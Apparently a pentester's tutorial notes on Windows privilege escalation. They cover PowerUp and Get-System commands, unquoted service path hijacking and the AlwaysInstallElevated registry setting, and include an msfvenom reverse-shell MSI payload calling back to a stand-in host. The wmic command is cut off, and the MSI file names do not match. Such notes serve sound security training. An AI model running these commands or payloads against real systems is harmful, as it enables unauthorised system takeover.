Privilege Escalation

PowerShellMafia

Try to use dev brach always. PowerView has some cool functions to use.

• https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

• https://github.com/PowerShellMafia/PowerSploit/blob/dev/Privesc/PowerUp.ps1

powershell.exe -c "Import-Module C:\Users\Public\PowerUp.ps1; Invoke-AllChecks"
powershell.exe -c "Import-Module C:\Users\Public\Get-System.ps1; Get-System"

Unquoted Service Paths

Let's say we have a system path like below.

C:\Program Files\IObit\Advanced SystemCare\ASCService.exe

Windows will first try execute it like below in the following order

• c:\program.exe

• C:\Program Files\IObit\Advanced.exe

• C:\Program Files\IObit\Advanced SystemCare\ASCService.exe

If we can plant the exe in one of the paths below we can elevate privileges

• Please note that we need to either have the ability to restart the machine or restart the service. Otherwise it's useless kinda.

Enumerating unquoted service paths

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v 

WinPeas

It is a great privilege escalation enumeration tool. Find the releases below and simply execute the binary.

• https://github.com/carlospolop/PEASS-ng/releases

.\winPEASx64_ofs.exe notcolor quiet

Seatbelt

• https://github.com/GhostPack/Seatbelt

Always Install Elevated

• https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated/#:~:text=For%20this%20purpose%2C%20the%20AlwaysInstallElevated,any%20program%20on%20the%20system.

Detecting if the OS is vulnerable,

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

If always install elevated is enabled, queries above should return 1.

Exploiting it is pretty simple. Generate an msi payload,

msfvenom -p windows/shell/reverse_tcp lhost=1.3.3.7 lport=9001 -f msi > shell.msi

Execute it,

msiexec /quiet /qn /i 1.msi